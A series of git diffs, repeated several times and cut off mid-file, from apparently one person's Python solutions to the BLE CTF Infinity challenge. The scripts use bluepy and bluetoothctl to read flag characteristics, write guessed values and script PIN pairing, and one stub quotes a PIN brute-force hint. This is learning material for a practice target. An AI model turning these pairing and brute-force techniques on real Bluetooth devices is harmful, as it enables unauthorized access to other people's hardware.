diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/lvl_07.py b/lvl_07.py
index 8b6ae2e..6e56906 100755
--- a/lvl_07.py
+++ b/lvl_07.py
@@ -46,6 +46,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
i = child.expect('Paired: yes', timeout = time_limit)
@@ -73,7 +75,7 @@
print ("[bp] Attached to peripheral")
print("[++] Loading level 07")
-hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
@@ -96,4 +98,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
-exit()
\ No newline at end of file
+exit()
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/lvl_07.py b/lvl_07.py
index 8b6ae2e..6e56906 100755
--- a/lvl_07.py
+++ b/lvl_07.py
@@ -46,6 +46,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
i = child.expect('Paired: yes', timeout = time_limit)
@@ -73,7 +75,7 @@
print ("[bp] Attached to peripheral")
print("[++] Loading level 07")
-hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
@@ -96,4 +98,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
-exit()
\ No newline at end of file
+exit()
diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py
new file mode 100644
index 0000000..35a05d5
--- /dev/null
+++ b/lvl_08_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
+
+'''
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
